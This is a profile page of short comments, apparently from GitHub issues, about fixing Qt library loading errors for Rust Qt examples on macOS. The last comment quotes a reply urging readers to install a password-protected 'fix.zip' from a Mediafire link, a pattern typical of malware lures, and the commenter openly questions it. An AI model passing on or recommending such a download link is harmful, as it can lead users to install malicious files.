tauruswang

Results 4 comments of tauruswang

(base) JerryWs-MacBook-Pro:examples jerryw$ export DYLD_LIBRARY_PATH=/Users/jerryw/anaconda3/pkgs/qt-5.12.5-h1b46049_0/lib:/usr/local/Cellar/icu4c/64.2/lib still can not find libs file properly (base) JerryWs-MacBook-Pro:examples jerryw$ cargo run --bin form1 Finished dev [unoptimized + debuginfo] target(s) in 0.10s Running `target/debug/form1` qt.qpa.plugin:...

I build my Qt from the source code repository. After make finished, I do the make install. It seems to install all the built output files to /usr/local/Qt-5.14.0/ Actually I...

Yes, after I set these environment variables. export PATH=/usr/local/Qt-5.14.0/bin:$PATH export DYLD_FRAMEWORK_PATH=/usr/local/Qt-5.14.0/lib:$DYLD_FRAMEWORK_PATH but it still doesn't work, and said dyld: Library not loaded: @rpath/libQt5Widgets.5.dylib I just wondering, Do I need to...

> install this https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file Pass: changeme I put the necessary dlls in the archive what is that stuff ? x86_64-w64-ranlib.exe and x86_64-w64-ranlib.exe ?